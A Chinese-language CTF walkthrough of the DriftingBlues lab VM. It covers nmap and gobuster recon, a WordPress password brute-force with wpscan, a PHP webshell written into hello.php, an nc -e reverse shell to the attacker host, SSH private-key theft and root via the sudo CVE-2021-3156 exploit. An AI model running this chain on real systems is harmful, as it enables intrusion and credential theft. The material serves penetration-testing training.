信息收集
nmap扫存活主机
sudo nmap -sV -A -p- 192.168.56.0/24
Nmap scan report for 192.168.56.137
Host is up (0.00072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (localhost) [::ffff:192.168.56.137]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=4/18%Time=6621BB3A%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,94,"220\x20ProFTPD\x20Server\x20\(localhost\)\x20\[::ffff:1
SF:92\.168\.56\.137\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mor
SF:e\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20
SF:creative\r\n");
MAC Address: 08:00:27:F3:2A:57 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
访问80端口,发现使用域名
将域名写入hosts即可正常访问
┌──(root㉿kali)-[~kali/Desktop]
└─# echo "192.168.56.137 driftingblues.box" >> /etc/hosts
目录爆破
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://driftingblues.box/blog -x txt,zip,rar
可以知道该靶机使用worldpress博客网站
使用wpscan扫描器扫描,先爆出用户
wpscan --url http://driftingblues.box/blog/ -e u
再爆破密码
wpscan --url http://driftingblues.box/blog/ -U albert -P /usr/share/wordlists/rockyou.txt
获取shell
登录后台,发现hello.php是可以编辑的,遂写入一句话木马
访问hello.php,成功执行phpinfo
http://192.168.56.137/blog/wp-content/plugins/hello.php?cmd=phpinfo();
nc反弹shell,注意payload需要url编码
http://192.168.56.137/blog/wp-content/plugins/hello.php?cmd=system(%27nc%20-e%20/bin/sh%20192.168.56.129%205555%27);
获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
发现普通用户freddie用户开启了ssh登录,且私钥是可读的
在kali上写入私钥文件,并设置为权限为600
chmod 600 id_ras_1
登录用户
ssh freddie@192.168.56.137 -i id_ras_1
权限提升
下载linpeas.sh脚本,赋予执行权限并执行
wget 192.168.56.129/1.sh
chmod +x 1.sh
发现存在sudo提权漏洞
下载exp:https://codeload.github.com/worawit/CVE-2021-3156/zip/main
项目地址:https://github.com/worawit/CVE-2021-3156
将压缩包保存到web服务器下,靶机下载
wget 192.168.56.129/CVE-2021-3156-main.zip
unzip CVE-2021-3156-main.zip
cd CVE-2021-3156-main/
执行exp获取root权限
python exploit_nss.py